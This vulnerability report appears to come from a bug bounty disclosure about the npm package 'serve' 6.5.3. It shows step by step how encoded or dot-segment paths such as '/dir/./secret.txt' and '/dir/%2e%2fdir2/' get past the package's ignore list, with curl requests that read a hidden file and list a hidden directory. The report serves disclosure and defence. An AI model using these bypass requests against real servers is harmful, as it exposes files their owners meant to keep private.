I would like to report a vulnerability in serve.
It allows listing directory and reading local files on the target server.
module name: serveversion:6.5.3npm page: https://www.npmjs.com/package/serve
Ever wanted to share a project on your network by running just a command? Then this module is exactly what you’re looking for: It provides a neat interface for listing the directory’s contents and switching into sub folders.
In addition, it’s also awesome when it comes to serving static sites!
$ npm i serve
$ mkdir dir
$ echo "This is secret content!!" > dir/secret.txt
$ mkdir dir/dir2
$ touch dir/dir2/3.txt
serve
for file serving listing and set a few folders and files in the ignore config.const serve = require('serve')
const server = serve(__dirname, {
port: 6060,
ignore: ['dir/secret.txt', 'dir/dir2']
})
$ node app.js
Now, the current directory will be served by this module on port 6060
with the exception of file dir/secret.txt
and directory 'dir/dir2
.
$ curl --path-as-is 'http://127.0.0.1:6060/dir/secret.txt'
Not Found
$ curl --path-as-is 'http://127.0.0.1:6060/dir/dir2/'
Not Found
or if we replace e
character with URI encoded form %65
, it still be ignored:
$ curl --path-as-is 'http://127.0.0.1:6060/dir/s%65cret.txt'
Not Found
$ curl --path-as-is 'http://127.0.0.1:6060/dir/./secret.txt'
This is secret content!!
Or listing the directory:
http://127.0.0.1:6060/dir/%2e%2fdir2/
{F279456}
It bypasses the ignore files/directories feature and allows an attacker to read a file or list the directory that the victim has not allowed access to.